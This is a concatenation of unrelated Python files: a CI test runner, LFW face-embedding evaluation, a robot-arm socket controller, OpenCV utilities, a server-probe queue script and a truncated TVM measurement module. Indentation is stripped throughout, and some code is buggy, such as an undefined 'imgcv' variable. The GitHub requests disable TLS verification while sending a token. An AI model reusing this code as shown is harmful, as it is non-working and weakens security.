t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
else:
file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
with open(file_path, "w") as is_build_passed_file:
is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: There is more then one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not res_dict.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
def main():
print("Time is: {}\n\n\n".format(datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 30 secs'.format(datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
lfw_eval.py | import multiprocessing as mp
import os
import pickle
import queue
from multiprocessing import Process
import cv2 as cv
import dlib
import numpy as np
from keras.applications.inception_resnet_v2 import preprocess_input
from tqdm import tqdm
from Base.config import lfw_folder, img_size, channel, threshold, predictor_path
from Base.utils import get_lfw_images, get_lfw_pairs, get_best_model
class InferenceWorker(Process):
def __init__(self, gpuid, in_queue, out_queue, signal_queue):
Process.__init__(self, name='ImageProcessor')
self.gpuid = gpuid
self.in_queue = in_queue
self.out_queue = out_queue
self.signal_queue = signal_queue
self.detector = dlib.get_frontal_face_detector()
self.sp = dlib.shape_predictor(predictor_path)
def run(self):
# set enviornment
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(self.gpuid)
print("InferenceWorker init, GPU ID: {}".format(self.gpuid))
from Base.model import build_model
# load models
model = build_model()
model.load_weights(get_best_model())
while True:
try:
sample = {}
try:
sample['a'] = self.in_queue.get(block=False)
sample['p'] = self.in_queue.get(block=False)
sample['n'] = self.in_queue.get(block=False)
except queue.Empty:
break
batch_inputs = np.empty((3, 1, img_size, img_size, channel), dtype=np.float32)
for j, role in enumerate(['a', 'p', 'n']):
image_name = sample[role]
filename = os.path.join(lfw_folder, image_name)
image = cv.imread(filename)
image = image[:, :, ::-1] # RGB
dets = self.detector(image, 1)
num_faces = len(dets)
if num_faces > 0:
# Find the 5 face landmarks we need to do the alignment.
faces = dlib.full_object_detections()
for detection in dets:
faces.append(self.sp(image, detection))
image = dlib.get_face_chip(image, faces[0], size=img_size)
else:
image = cv.resize(image, (img_size, img_size), cv.INTER_CUBIC)
batch_inputs[j, 0] = preprocess_input(image)
y_pred = model.predict([batch_inputs[0], batch_inputs[1], batch_inputs[2]])
a = y_pred[0, 0:128]
p = y_pred[0, 128:256]
n = y_pred[0, 256:384]
self.out_queue.put({'image_name': sample['a'], 'embedding': a})
self.out_queue.put({'image_name': sample['p'], 'embedding': p})
self.out_queue.put({'image_name': sample['n'], 'embedding': n})
self.signal_queue.put(SENTINEL)
if self.in_queue.qsize() == 0:
break
except Exception as e:
print(e)
import keras.backend as K
K.clear_session()
print('InferenceWorker done, GPU ID {}'.format(self.gpuid))
class Scheduler:
def __init__(self, gpuids, signal_queue):
self.signal_queue = signal_queue
manager = mp.Manager()
self.in_queue = manager.Queue()
self.out_queue = manager.Queue()
self._gpuids = gpuids
self.__init_workers()
def __init_workers(self):
self._workers = list()
for gpuid in self._gpuids:
self._workers.append(InferenceWorker(gpuid, self.in_queue, self.out_queue, self.signal_queue))
def start(self, names):
# put all of image names into queue
for name in names:
self.in_queue.put(name)
# start the workers
for worker in self._workers:
worker.start()
# wait all fo workers finish
for worker in self._workers:
worker.join()
print("all of workers have been done")
return self.out_queue
def run(gpuids, q):
# scan all files under img_path
names = get_lfw_images()
# init scheduler
x = Scheduler(gpuids, q)
# start processing and wait for complete
return x.start(names)
SENTINEL = 1
def listener(q):
pbar = tqdm(total=13233 // 3)
for item in iter(q.get, None):
pbar.update()
def create_lfw_embeddings():
gpuids = ['0', '1', '2', '3']
print(gpuids)
manager = mp.Manager()
q = manager.Queue()
proc = mp.Process(target=listener, args=(q,))
proc.start()
out_queue = run(gpuids, q)
out_list = []
while out_queue.qsize() > 0:
out_list.append(out_queue.get())
with open("data/lfw_embeddings.p", "wb") as file:
pickle.dump(out_list, file)
q.put(None)
proc.join()
if __name__ == "__main__":
print('creating lfw embeddings')
create_lfw_embeddings()
with open('data/lfw_embeddings.p', 'rb') as file:
embeddings = pickle.load(file)
pairs = get_lfw_pairs()
y_true_list = []
y_pred_list = []
print('evaluating lfw database')
for pair in tqdm(pairs):
image_name_1 = pair['image_name_1']
image_name_2 = pair['image_name_2']
y_true = pair['same_person']
y_true_list.append(y_true)
embedding_1 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_1][0])
embedding_2 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_2][0])
dist = np.square(np.linalg.norm(embedding_1 - embedding_2))
y_pred = dist <= threshold
y_pred_list.append(y_pred)
y = np.array(y_true_list).astype(np.int32)
pred = np.array(y_pred_list).astype(np.int32)
from sklearn import metrics
print(y)
print(pred)
fpr, tpr, thresholds = metrics.roc_curve(y, pred)
print('showing lfw accuracy: ' + str(metrics.auc(fpr, tpr)))
|
main.py | from servo import *
from TempSensor import *
from DistanceSensor import *
import time
import threading
import json
import urllib.request
from urllib.parse import urlencode
from programs import *
DHT11 = temp_sensor(23)
command = dict()
command["motor1"] = 0 #base left right
command["motor2"] = 0 #arm up down
command["motor3"] = 0 #arm forward backward
command["motor4"] = 0 #gripper clockwise counter clockwose
command["motor5"] = 90 #gripper open close
global program
program = "manual"
global program_flag
program_flag = False
global Humidity
Humidity = 0
global Temperature
Temperature = 0
def update_sensor_vals():
global Humidity
global Temperature
while(True):
Humidity , Temperature = DHT11.get_temp_and_hum()
time.sleep(0.2)
# def polling_thread():
# response_dict = dict()
# global Temperature
# global Humidity
# global program
# global program_flag
# while(True):
# data = urlencode({"humidity":Humidity,"temperature":Temperature}).encode()
# url = 'http://shadyganem.com/dataExchange.php'
# try:
# with urllib.request.urlopen(url,data) as response:
# res = response.read(100)
# response_dict = json.loads(res.decode())
# mode = response_dict.get("mode","manual")
# global program_flag
# if mode == "manual":
# command["motor1"] = int(response_dict.get("motor1",90))
# command["motor2"] = int(response_dict.get("motor2",90))
# command["motor5"] = int(response_dict.get("motor5",90))
# command["motor3"] = int(response_dict.get("motor3",90))
# command["motor4"] = int(response_dict.get("motor4",90))
# else:
# print("selected mode = {}".format(mode))
# program = mode
# for key,val in response_dict.items():
# print(key+" : "+val)
# except Exception as e:
# print("\033[91mConnection with server is down\033[0m {}".format(str(e)))
def main2():
global Temperature
global Humidity
global program
global program_flag
import socket
Host = "160.153.249.247"
Port = 1234
try:
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((Host,Port))
print("connected")
while True:
out_msg = '{"humidity":"' + str(Humidity) +'","temperature":"' + str(Temperature) + '"}'
client_socket.send(bytes(out_msg,'utf-8'))
msg = client_socket.recv(1024)
print(msg.decode('utf-8'))
response_dict = json.loads(msg.decode('utf-8'))
mode = response_dict.get("mode","manual")
if mode == "manual":
command["motor1"] = int(response_dict.get("motor1",90))
command["motor2"] = int(response_dict.get("motor2",90))
command["motor5"] = int(response_dict.get("motor5",90))
command["motor3"] = int(response_dict.get("motor3",90))
command["motor4"] = int(response_dict.get("motor4",90))
else:
print("selected mode = {}".format(mode))
program = mode
except Exception as e:
client_socket.close()
print("socket closed")
raise e
except KeyboardInterrupt:
print("FUCK YOU ALL")
finally:
client_socket.close()
def main():
global program
global program_flag
get_commamds = threading.Thread(target=main2)
get_commamds.start()
read_sensor = threading.Thread(target=update_sensor_vals)
read_sensor.start()
distance_sensor = dist_sensor(4,17)
driver = servo_driver()
motor1 = motor(driver,0,90)
motor2 = motor(driver,3,0)
motor3 = motor(driver,6,0)
motor4 = motor(driver,9,0)
motor5 = motor(driver,12,0)
virtual_motor = motor(driver,15,0)
while(True):
if program == "manual":
motor1.set_angle(command["motor1"])
motor2.set_angle(command["motor2"])
motor3.set_angle(command["motor3"])
motor4.set_angle(command["motor4"])
motor5.set_angle(command["motor5"])
virtual_motor.set_angle(90)
elif program == "program1":
program_flag = True
print("running program1")
program = "manual"
get_commamds.join()
if __name__=="__main__":
main()
|
utils_opencv.py | import cv2
import numpy as np
from threading import Thread
from PIL import Image
try:
from queue import Queue
except ImportError:
from Queue import Queue
cv2_version = cv2.__version__.split('.')[0]
FACE_PAD = 50
class VideoStream(object):
def __init__(self, url, queueSize=4):
self.stream = cv2.VideoCapture(url)
if cv2_version == '3':
self.stream.set(cv2.CAP_PROP_BUFFERSIZE,3)
self.stopped = False
self.frameBuffer = Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while self.stream.isOpened():
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, ensure the queue has room in it
if not self.frameBuffer.full():
(grabbed, frame) = self.stream.read()
if not grabbed:
self.stop()
return
# add the frame to the queue
self.frameBuffer.put(frame)
def read(self):
# return next frame in the queue
return self.frameBuffer.get()
def more(self):
# return True if there are still frames in the queue
return self.frameBuffer.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def showImage(img, window = 'Image'):
""" Shows the image in a resizeable window"""
cv2.namedWindow(window, cv2.WINDOW_NORMAL)
cv2.imshow(window, img)
def resizeImg(img, size, keepAspect = False, padding = False):
""" Resize the image to given size.
img -- input source image
size -- (w,h) of desired resized image
keepAspect -- to preserve aspect ratio during resize
padding -- to add black padding when target aspect is different
"""
dtype = img.dtype
outW, outH = size
if len(img.shape)>2:
h, w, d = img.shape[:3]
if padding:
outimg = np.zeros((outH, outW, d), dtype=dtype)
else:
h, w = img.shape[:2]
if padding:
outimg = np.zeros((outH, outW), dtype=dtype)
if keepAspect:
aspect = float(w)/h
if int(outH*aspect) < outW: #output image is wider so limiting factor is height
out = cv2.resize(img, (int(outH*aspect), outH))
if padding:
outimg[:, (outW-int(outH*aspect))/2:(outW+int(outH*aspect))/2, ] = out
out = outimg
else:
out = cv2.resize(img, (outW, int(outW/aspect)))
if padding:
outimg[(outH-int(outW/aspect))/2:(outH+int(outW/aspect))/2, ] = out
out = outimg
else:
out = cv2.resize(img, size)
return out
def subImage(img, bbox, padding_type = "50_pixel", padding=FACE_PAD):
if padding_type == "50_pixel":
upper_cut = [min(img.shape[0], int(bbox['bottomright']['y']) + padding), min(img.shape[1], int(bbox['bottomright']['x']) + padding)]
lower_cut = [max(int(bbox['topleft']['y']) - padding, 0), max(int(bbox['topleft']['x']) - padding, 0)]
roi_color = img[lower_cut[0]:upper_cut[0], lower_cut[1]:upper_cut[1]]
return roi_color
if padding_type == "percentage":
x1, y1 = bbox['topleft']['x'], bbox['topleft']['y']
x2, y2 = bbox['bottomright']['x'], bbox['bottomright']['y']
if padding_type == "percentage":
offset = padding*(x2 + y2 - x1 - y1)/200
else:
offset = padding
upper_cut = [min(imgcv.shape[0], y2 + offset),
min(imgcv.shape[1], x2 + offset)]
lower_cut = [max(y1 - offset, 0),
max(x1 - offset, 0)]
sub_img = imgcv[lower_cut[0]:upper_cut[0], lower_cut[1]:upper_cut[1]]
return sub_img
if padding_type == "coral":
x1, y1 = bbox['topleft']['x'], bbox['topleft']['y']
x2, y2 = bbox['bottomright']['x'], bbox['bottomright']['y']
width = x2 - x1
height = y2 - y1
tol = 15
up_down = 5
diff = height-width
if(diff > 0):
if not diff % 2: # symmetric
y1 = y1-tol-up_down if (y1-tol-up_down) >= 0 else 0
y2 = y2+tol-up_down if (y2+tol-up_down) < img.shape[0] else img.shape[0]-1
x1 = x1-tol-int(diff/2) if (x1-tol-int(diff/2)) >=0 else 0
x2 = x2+tol+int((diff+1)/2) if (x2+tol+int((diff+1)/2)) < img.shape[1] else img.shape[1]-1
tmp = img[y1:y2,x1:x2,:]
else:
y1 = y1-tol-up_down if (y1-tol-up_down) >= 0 else 0
y2 = y2+tol-up_down if (y2+tol-up_down) < img.shape[0] else img.shape[0]-1
x1 = x1-tol-int((diff-1)/2) if (x1-tol-int((diff-1)/2)) >=0 else 0
x2 = x2+tol+int((diff+1)/2) if (x2+tol+int((diff+1)/2)) < img.shape[1] else img.shape[1]-1
tmp = img[y1:y2,x1:x2,:]
if(diff <= 0):
if not diff % 2: # symmetric
y1 = y1-tol-int(diff/2)-up_down if (y1-tol-int(diff/2)-up_down) >= 0 else 0
y2 = y2+tol+int(diff/2)-up_down if (y2+tol+int(diff/2)-up_down) < img.shape[0] else img.shape[0]-1
x1 = x1-tol if (x1-tol) >= 0 else 0
x2 = x2+tol if (x2+tol) < img.shape[1] else img.shape[1]-1
tmp = img[y1:y2,x1:x2,:]
else:
y1 = y1-tol-int((diff-1)/2)-up_down if (y1-tol-int((diff-1)/2)-up_down) >=0 else 0
y2 = y2+tol+int((diff+1)/2)-up_down if (y2+tol+int((diff+1)/2)-up_down) < img.shape[0] else img.shape[0]-1
x1 = x1-tol if (x1-tol) >= 0 else 0
x2 = x2+tol if (x2+tol) < img.shape[1] else img.shape[1]-1
tmp = img[y1:y2,x1:x2,:]
tmp = np.array(Image.fromarray(np.uint8(tmp)).resize((120, 120), Image.ANTIALIAS))
return tmp
def rotateImg(img, angle, crop = False):
""" Rotate an image counter-clockwise by given angle with or without cropping.
img -- input source image
angle -- angle in degrees to ratate the img to
crop -- to change/preserve the size while rotating
"""
h, w = img.shape[:2]
centre = (img.shape[1]/2, img.shape[0]/2)
M = cv2.getRotationMatrix2D(centre, angle, 1.0)
if crop:
out = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_LINEAR)
else:
rangle = np.deg2rad(angle)
H = abs(h*np.cos(rangle) + w*np.sin(rangle))
W = abs(w*np.cos(rangle) + h*np.sin(rangle))
M[0,2] += (W-w)/2
M[1,2] += (H-h)/2
out = cv2.warpAffine(img, M, (int(W), int(H)))
return out
def drawLabel(img, text, topleft, font=cv2.FONT_HERSHEY_SIMPLEX, size = 0.6, color=(0,255,0), thickness=2):
# draw class text
x, y = topleft
yoff = -10 if y > 20 else 20 # text remains inside image
if cv2_version == '2':
cv2.putText(img, text, (x, y+yoff), font, size, color, thickness, cv2.CV_AA)
else:
cv2.putText(img, text, (x, y+yoff), font, size, color, thickness, cv2.LINE_AA)
return img
def showImagesInDirectory(directory):
""" Shows all the images in a directory and its sub-directories. """
from os import walk, path
for root, dirnames, filenames in walk(directory):
for name in filenames:
try:
file_path = path.join(root, name)
frame = cv2.imread(file_path, -1)
print('Original Image Size:', frame.shape, name)
showImage(frame)
except Exception as e:
print('Exception: ', e)
key = 0xFF & cv2.waitKey(0)
if key == 27:
break
if key == 27:
break
cv2.destroyAllWindows()
if __name__ == '__main__':
import time
# showImagesInDirectory('/home/aestaq/Pictures')
cap = VideoStream('/home/aestaq/Videos/qb.mp4').start()
time.sleep(1.0)
while not cap.stopped:
frame = cap.read()
frame = resizeImg(frame, (400, 400), keepAspect=True, padding=True)
showImage(frame)
key = cv2.waitKey(1) & 0xFF
if key == 27:
break
|
cluster_setup_add.py | # Copyright 2010-2012 Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add new servername entries to an existing run
CSV formats
index, hostname, port, protocol
index, hostname, port # HTTPS assumed
index, hostname # Port 443, HTTPS assumed; line starts with number
hostname, port # HTTPS assumed; line starts with letter; port may be empty
Options:
--input <name> : CSV File containing a list of hosts
--count <num> : Only configure max <num> servers from the source
--run-id <num> : add the new entries to this job
--verbose : Print more information
--testbase2 : use the debug test database for this job
--threads <num> : Use the specified number of threads when inserting the entries for the job
"""
from optparse import OptionParser
import probedb.standalone
import probedb.cluster.models as Cluster
import probedb.probedata2.models as Probe
import probedb.resultdb2.models as Results
import fileinput
from django.db import connection, transaction
import datetime
import threading
from multiprocessing import Process, JoinableQueue as Queue, Lock
def __ProgressCounter(run, queue, threads, options):
i=0
while True:
queue.get()
i += 1
if i%100 == 0:
if options.verbose:
print "Queued ", i, "servers so far. Threads active ", sum([t.is_alive() for t in threads])
queue.task_done()
def SetupQueueThread(tid, run, probe_servers, progress_queue, ):
connection.close()
try:
while True:
item = probe_servers.get()
if isinstance(item, int):
try:
item = Probe.Server.objects.get(id=item)
except:
probe_servers.task_done()
continue
hostname = item.servername.strip()
if (not hostname or
any([x in hostname for x in " \t%/&#\"'\\{[]}()*,;<>$"]) or
any([ord(x)>=128 or ord(x)<=32 for x in hostname])):
item.enabled = False
item.save()
probe_servers.task_done()
continue
hostname = hostname.strip(".")
while hostname.find("..")>=0:
hostname = hostname.replace("..", ".")
if hostname != item.servername:
item.enabled = False
item.save()
item = "0," + hostname+","+str(item.port) # Convert to string to correct the list
if not isinstance(item, Probe.Server):
hostname_line = item
if not hostname_line.strip():
probe_servers.task_done()
continue
split_line = hostname_line.strip().split(",")
if len(split_line) > 2:
(index, hostname, port) = split_line[:3]
else:
port = ""
(var1, var2) = split_line
if var1.isdigit():
(index, hostname) = (var1, var2)
else:
(hostname, port) = (var1, var2)
hostname = hostname.strip()
if (not hostname or
any([x in hostname for x in " \t%/&#\"'\\{[]}()*,;<>$"]) or
any([ord(x)>=128 or ord(x)<=32 for x in hostname])):
probe_servers.task_done()
continue
hostname = hostname.strip(".")
while hostname.find("..")>=0:
hostname = hostname.replace("..", ".")
if not port:
port = 443
else:
port = int(port)
sn_t = "%s:%05d" % (hostname, port)
(item, created) = Probe.Server.objects.get_or_create(
full_servername = sn_t,
defaults={'enabled':True,
"alexa_rating":0,
"servername":hostname,
"port": port,
}
)
if created:
item.Construct()
if item.enabled:
try:
sid = transaction.savepoint()
run_entry = Probe.ProbeQueue.objects.create(part_of_run=run,server=item,state=Probe.ProbeQueue.PROBEQ_IDLE)
transaction.savepoint_commit(sid)
progress_queue.put(True)
except:
transaction.savepoint_rollback(sid)
pass
probe_servers.task_done()
except:
pass
def setup_queue(options):
probe_servers = Queue()
progress_queue = Queue()
run = Probe.ProbeRun.objects.get(id = options.run_id)
summary_top = Results.ResultSummaryList.objects.get(part_of_run=run)
summary_top.setup()
connection.close()
threads = []
for i in range(options.threads):
new_thread = Process(target=SetupQueueThread, args=(i,run, probe_servers, progress_queue))
new_thread.daemon = True
new_thread.start()
threads.append(new_thread)
progress_thread = threading.Thread(target=__ProgressCounter, args=(run, progress_queue, threads,options))
progress_thread.daemon = True
progress_thread.start()
i = 0;
if options.input_filename and (not options.count or i < options.count):
for hostname_line in fileinput.input(options.input_filename, openhook=fileinput.hook_compressed):
probe_servers.put(hostname_line)
i+=1
if options.count and i >= options.count:
break;
probe_servers.join()
progress_queue.join()
return run
def main():
options_config = OptionParser()
options_config.add_option("--input", action="store", type="string", dest="input_filename", default="testlist.csv")
options_config.add_option("--testbase2", action="store_true", dest="use_testbase2")
options_config.add_option("--threads", action="store", type="int", dest="threads", default=30)
options_config.add_option("--verbose", action="store_true", dest="verbose")
options_config.add_option("--count", action="store", type="int", dest="count", default=0)
options_config.add_option("--run-id", action="store", type="int", dest="run_id", default=0)
(options, args) = options_config.parse_args()
started = datetime.datetime.now()
run = setup_queue(options)
if options.verbose:
print "Run %d for %s/%s has been updated with more items. Total %d items" %(run.id, run.source_name, run.description, Probe.ProbeQueue.objects.filter(part_of_run=run).count())
ended = datetime.datetime.now()
if options.verbose:
print "Time to run: ", (ended-started)
if __name__ == "__main__":
main() |
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.target import build_config
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
"""
Stores all the necessary inputs for a measurement.
Parameters
----------
filename : str
The filename of generated library
arg_info : Tuple
The shape and dtype information of tvm tensor arguments
error : Exception
The error happens during compilation.
time_cost : float
The time cost of building
"""
class LocalBuilder(Builder):
"""Run compilation on local machine
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
build_func: callable or str
If is 'default', use default build function
If is 'ndk', use function for android ndk
If is callable, use it as custom build function, expect lib_format field.
"""
def __init__(self, timeout=10, n_parallel=None, build_func='default'):
super(LocalBuilder, self).__init__(timeout, n_parallel)
if isinstance(build_func, str):
if build_func == 'default':
build_func = tar.tar
elif build_func == 'ndk':
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
self.build_func = _wrap_build_func(build_func)
self.executor = LocalExecutor(timeout=timeout)
self.tmp_dir = tempfile.mkdtemp()
def build(self, measure_inputs):
results = []
shutil.rmtree(self.tmp_dir, ignore_errors=True)
self.tmp_dir = tempfile.mkdtemp()
for i in range(0, len(measure_inputs), self.n_parallel):
# print("n_parallel" + str(self.n_parallel))
futures = []
for inp in measure_inputs[i:i + self.n_parallel]:
ret = self.executor.submit(self.build_func,
inp,
self.tmp_dir,
**self.build_kwargs)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception):
# timeout or fleet error, return MeasureResult directly
results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
self.timeout, time.time()))
elif res.error is not None:
# instantiation error
if isinstance(res.error, InstantiationError):
results.append(MeasureResult((res.error,),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else:
if "InstantiationError" in str(res.error):
msg = str(res.error)
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
results.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else: # tvm error
results.append(MeasureResult((res.error,),
MeasureErrorNo.COMPILE_HOST,
res.time_cost, time.time()))
else:
# return BuildResult
results.append(res)
return results
class RPCRunner(Runner):
"""Run generated code on remove devices.
This function will ask a RPC Tracker to get device for measurement.
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
key: str
The key of the device registered in the tracker
host: str
The host address of RPC Tracker
port: int
The port of RPC Tracker
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first "1" is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
"""
def __init__(self,
key, host, port, priority=1,
timeout=10, n_parallel=None,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(RPCRunner, self).__init__(timeout, n_parallel)
self.key = key
self.host = host
self.port = port
self.priority = priority
self.timeout = timeout
self.number = number
self.repeat = repeat
self.min_repeat_ms = min_repeat_ms
self.ref_input = None
self.ref_output = None
self.check_correctness = check_correctness
self.cooldown_interval = cooldown_interval
self.executor = LocalExecutor()
def set_task(self, task):
self.task = task
if check_remote(task.target, self.key, self.host, self.port):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
if self.check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in self.ref_input]
func(*tvm_buf)
self.ref_output = [x.asnumpy() for x in tvm_buf]
def get_build_kwargs(self):
kwargs = {}
if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
'rocm' in self.task.target.keys:
remote = request_remote(self.key, self.host, self.port)
ctx = remote.context(str(self.task.target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in self.task.target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
return kwargs
def run(self, measure_inputs, build_results):
results = []
remote_args = (self.key, self.host, self.port, self.priority, self.timeout)
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
build_results[i:i+self.n_parallel]):
ret = self.executor.submit(run_through_rpc,
measure_inp,
build_res,
self.number,
self.repeat,
self.min_repeat_ms,
self.cooldown_interval,
remote_args,
self.ref_input,
self.ref_output)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception): # executor error or timeout
results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
self.timeout, time.time()))
else:
results.append(res)
return results
class LocalRunner(RPCRunner):
"""Run generated code on local devices.
Parameters
----------
timeout: float
The timeout of a compilation
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
Note
----
This is a "fake" local mode. We start a silent rpc tracker and rpc server
for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
"""
def __init__(self,
timeout=10,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
